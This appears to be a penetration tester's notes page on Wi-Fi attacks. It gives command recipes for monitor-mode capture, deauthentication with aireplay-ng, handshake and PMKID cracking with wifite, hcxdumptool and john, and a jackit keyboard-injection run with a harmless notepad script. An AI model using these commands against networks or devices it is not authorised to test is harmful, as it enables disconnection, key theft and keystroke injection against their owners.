# WiFi

## Tips

```
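# Survey nearby networks
sudo kismet

# Stop services that interfere with the monitor-mode interface
sudo systemctl stop NetworkManager.service
sudo systemctl stop wpa_supplicant.service

# Capture on channel 11, filtered by BSSID or by ESSID regex; output files are prefixed "psk"
sudo airodump-ng -c 11 --bssid=D0:D3:E0:47:B0:01 -w psk wlp0s20f3mon
sudo airodump-ng -c 11 --essid-regex XX-Corporate -w psk wlp0s20f3mon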

```

## Deauth

```
sudo aireplay-ng -0 1 -a D0:D3:E0:47:B0:01 wlp0s20f3mon

# Target client:

sudo aireplay-ng -0 1 -a D0:D3:E0:47:B0:01 -c xx:xx:xx:xx wlp0s20f3mon
```

## iwctl

```
:> iwctl

NetworkConfigurationEnabled: disabled
StateDirectory: /var/lib/iwd
Version: 2.15
[iwd]# station 
list  wlan1 
[iwd]# station wlan1 scan
[iwd]# station wlan1 get-networks 
```

<figure><img src="https://4052868066-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MWd-VcvRHVgUtkahm85%2Fuploads%2FWeIfjOLmmTN94XwIXjRJ%2Fimage.png?alt=media&#x26;token=3f018600-47d3-4e4b-aa3b-b7fa22f11fb3" alt=""><figcaption></figcaption></figure>

## wifite

```
sudo wifite

# WPS:
wifite -e nomedarede
wifite -e rede --pmkid
wifite -c 10   # hidden SSIDs
wifite --wep
wifite --crack

# https://github.com/derv82/wifite2
```

## hcxdumptool

```
sudo hcxdumptool -i wlan3 -w output
hcxpcapngtool -o hashcat output --prefix=hash2200 --john=cracking_john --all

# Get all the obtained networks (sort -u also drops non-adjacent duplicates):
cut -d ":" -f1 cracking_john | sort -u

john --wordlist=/usr/share/wordlists/wifite.txt cracking_john 
```

## nRFID

```
sudo ./jackit  --script script.txt 

[+] Scanning every 5s CTRL-C when ready.

  KEY  ADDRESS           CHANNELS    COUNT  SEEN         TYPE        PACKET
-----  --------------  ----------  -------  -----------  ----------  -----------------
    1  E7:40:62:76:02          79        2  0:03:49 ago  Amazon HID  02:FC:EF:FF:02:5D
    2  37:DD:35:EA:10  23,41             4  0:01:29 ago  Unknown  02:09:D0:FF:47


[+] Select target keys (1-1) separated by commas, or 'all':  [all]: 1   
[+] Ping success on channel 2
[+] Sending attack to E7:40:62:76:02 [Amazon HID] on channel 2

[+] All attacks completed


```

```
DELAY 500
GUI r 
DELAY 500
STRING notepad.exe  
ENTER 
DELAY 1000 
STRING Hello World! 
```

{% embed url="<https://www.blackhillsinfosec.com/executing-keyboard-injection-attacks/>" %}

## References

{% embed url="<https://tbhaxor.com/evil-twin-wifi-network-using-hostapd-mana/>" %}

{% embed url="<https://www.netprojnetworks.com/setting-up-a-wireless-pentest-lab-part-2/>" %}

{% embed url="<https://www.netprojnetworks.com/wireless-pentest-lab-part-3/>" %}

